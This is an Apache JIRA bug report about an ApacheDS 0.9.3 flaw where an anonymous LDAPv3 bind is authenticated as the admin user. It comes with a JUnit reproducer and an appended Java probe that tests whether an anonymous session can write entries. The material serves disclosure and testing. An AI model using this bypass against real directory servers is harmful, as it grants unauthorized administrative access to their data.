Apache Directory Project - [jira] Updated: (DIREVE-239) Anonymous user may gain access as admin user


[jira] Updated: (DIREVE-239) Anonymous user may gain access as admin user
Alex Karasulu (JIRA)

2005-08-31, 2:45 am

[ http://issues.apache.org/jira/brows...VE-239?page=all ]

Alex Karasulu updated DIREVE-239:
---------------------------------

Priority: Blocker (was: Major)

Not good, a major blocker.

> Anonymous user may gain access as admin user
> --------------------------------------------
>
> Key: DIREVE-239
> URL: http://issues.apache.org/jira/browse/DIREVE-239
> Project: Directory Server
> Type: Bug
> Versions: 0.9.3
> Reporter: Endi S. Dewata
> Assignee: Alex Karasulu
> Priority: Blocker


>
> Anonymous user may gain access as admin user by specifying java.naming.ldap.version=3 in the JNDI client.
> To show the problem, add a print statement in the AuthenticationService.java at line 369:
>
>     // perform the authentication
>     LdapPrincipal authorizationId = authenticator.authenticate( ctx );
>     System.out.println("Authorization ID: "+authorizationId);
>
> Start the server, then run the following program:
>
>     import java.util.Hashtable;
>     import javax.naming.Context;
>     import javax.naming.NamingEnumeration;
>     import javax.naming.directory.DirContext;
>     import javax.naming.directory.InitialDirContext;
>     import javax.naming.directory.SearchControls;
>     import javax.naming.directory.SearchResult;
>     import junit.framework.TestCase;
>
>     public class Test extends TestCase {
>
>         public void testAnonymousBindWithLDAPVersion3() throws Exception {
>             String suffix = "dc=apache,dc=org";
>
>             Hashtable env = new Hashtable();
>             env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
>             env.put(Context.PROVIDER_URL, "ldap://localhost:10389/");
>             // No SECURITY_PRINCIPAL and no SECURITY_CREDENTIALS: this is an anonymous bind.
>             // Uncomment the next line to reproduce the problem (anonymous bind with LDAPv3).
>             // env.put("java.naming.ldap.version", "3");
>
>             DirContext ctx = new InitialDirContext(env);
>             SearchControls sc = new SearchControls();
>             sc.setSearchScope(SearchControls.SUBTREE_SCOPE);
>             NamingEnumeration ne = ctx.search(suffix, "(objectClass=*)", sc);
>
>             System.out.println("Search results:");
>             int counter = 0;
>             while (ne.hasMore()) {
>                 SearchResult sr = (SearchResult) ne.next();
>                 // getName() is relative to the search base; the base entry itself comes back with an empty name
>                 String rdn = sr.getName();
>                 System.out.println(" - " + ("".equals(rdn) ? suffix : rdn + "," + suffix));
>                 counter++;
>             }
>             System.out.println("Found " + counter + " entries.");
>             ctx.close();
>         }
>     }
>
> Without specifying java.naming.ldap.version=3, the user will remain anonymous (empty Authentication ID). However, with java.naming.ldap.version=3, the anonymous user gets authenticated as the admin user without even specifying any password.


--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
http://issues.apache.org/jira/secur...nistrators.jspa
-
For more information on JIRA, see:
http://www.atlassian.com/software/jira
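A client-side check for the behaviour described in the report, added here as an example; it is not code from the bug report or from the ApacheDS project. The report's reproducer only shows the problem through a print statement inside the server, so this probe instead binds with no DN and no password, once with the JNDI provider's default LDAP version and once with java.naming.ldap.version=3, and then attempts a write that a genuinely anonymous session must not be allowed: adding and immediately removing a throwaway organizationalUnit under the suffix. The server URL and suffix are the ones from the report; the probe entry name is made up here, and the check assumes the server answers anonymous writes with insufficientAccessRights (which JNDI surfaces as NoPermissionException). On a server that permits anonymous writes for some other reason the two runs will not differ, and the server-side print from the report remains the better signal.

```java
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.NamingException;
import javax.naming.NoPermissionException;
import javax.naming.directory.BasicAttribute;
import javax.naming.directory.BasicAttributes;
import javax.naming.directory.DirContext;
import javax.naming.directory.InitialDirContext;

/**
 * Probe for the DIREVE-239 symptom: does an anonymous bind (no DN, no password)
 * end up with admin-level rights when the client forces LDAPv3?
 *
 * Strategy: bind anonymously, then try a write. A correctly behaving server
 * refuses the write for an anonymous session; a server showing the reported
 * behaviour lets it through because the session is really the admin user.
 */
public class AnonymousBindProbe {

    // URL and suffix taken from the bug report.
    static final String URL = "ldap://localhost:10389/";
    static final String SUFFIX = "dc=apache,dc=org";
    // Hypothetical throwaway entry used only for the write test (assumption: it does not already exist).
    static final String PROBE_RDN_VALUE = "direve239-probe";
    static final String PROBE_DN = "ou=" + PROBE_RDN_VALUE + "," + SUFFIX;

    /**
     * Binds anonymously (optionally forcing the given LDAP protocol version) and
     * returns true if the session was allowed to add an entry under the suffix,
     * i.e. the "anonymous" session holds write rights it should not have.
     */
    static boolean anonymousCanWrite(String ldapVersion) throws NamingException {
        Hashtable<String, String> env = new Hashtable<>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, URL);
        // Explicit anonymous bind: no SECURITY_PRINCIPAL, no SECURITY_CREDENTIALS.
        env.put(Context.SECURITY_AUTHENTICATION, "none");
        if (ldapVersion != null) {
            // Same property the report uses to trigger the problem.
            env.put("java.naming.ldap.version", ldapVersion);
        }

        DirContext ctx = new InitialDirContext(env);
        try {
            BasicAttributes attrs = new BasicAttributes(true);
            BasicAttribute objectClass = new BasicAttribute("objectClass");
            objectClass.add("top");
            objectClass.add("organizationalUnit");
            attrs.put(objectClass);
            attrs.put("ou", PROBE_RDN_VALUE);

            // The write that an anonymous session must be denied.
            ctx.createSubcontext(PROBE_DN, attrs);

            // If we get here the add succeeded: clean up and report the finding.
            ctx.destroySubcontext(PROBE_DN);
            return true;
        } catch (NoPermissionException denied) {
            // LDAP result code 50 (insufficientAccessRights): the expected answer for a real anonymous session.
            return false;
        } finally {
            ctx.close();
        }
    }

    public static void main(String[] args) throws NamingException {
        boolean defaultVersion = anonymousCanWrite(null);
        boolean forcedV3 = anonymousCanWrite("3");
        System.out.println("anonymous bind, provider default version: can write = " + defaultVersion);
        System.out.println("anonymous bind, java.naming.ldap.version=3: can write = " + forcedV3);
        if (forcedV3 && !defaultVersion) {
            System.out.println("Server shows the DIREVE-239 behaviour: anonymous LDAPv3 bind has write rights.");
        }
    }
}
```

Run it only against a test instance, since a server with the reported behaviour will accept the add. Any NamingException other than NoPermissionException is deliberately left to propagate, so a connection failure or an unexpected error code is visible rather than being mistaken for a denied write.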

